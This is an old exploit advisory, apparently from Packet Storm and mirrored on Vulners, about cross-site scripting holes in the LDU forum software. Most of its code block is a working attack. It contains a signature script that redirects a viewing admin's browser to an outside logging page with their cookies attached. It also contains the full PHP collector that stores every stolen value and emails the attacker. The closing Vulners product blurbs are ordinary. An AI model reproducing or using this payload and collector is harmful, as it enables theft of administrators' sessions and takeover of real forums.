Lucene search
K

lduXSS2.txt

🗓️ 31 Aug 2005 00:00:00Reported by spyMASterType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

There are XSS vulnerabilities in LDU allowing cookie theft and redirection when admin views certain forum posts

Code
`Bug finder:spyMASter  
Web site:Realhackers.net  
Contact:[email protected]  
  
LDU has some xss vulns   
Firstly you can use html codes in your signature you can get cookies with this  
put your signature that code  
  
<SCRIPT> location.href='http://site.com/log/ekle.php?c='+escape(document. cookie)</SCRIPT>  
  
and post a topic to forum when admin look this topic she/he redirect and you can get cookie  
  
this is codes of ekle.php you can save cookie to a with this php code  
  
  
<?php  
$kayit = fopen("spymaster.txt","a");  
foreach($_GET as $variable => $value) {  
fwrite($kayit,$variable . ": " . $value . "\n");  
}  
fwrite($kayit,"---------------------------\n");  
fclose($kayit);  
mail("[email protected]","your cookie ready","http://www.realhackers.net/spyoku.txt",'From: [email protected]');  
?>  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation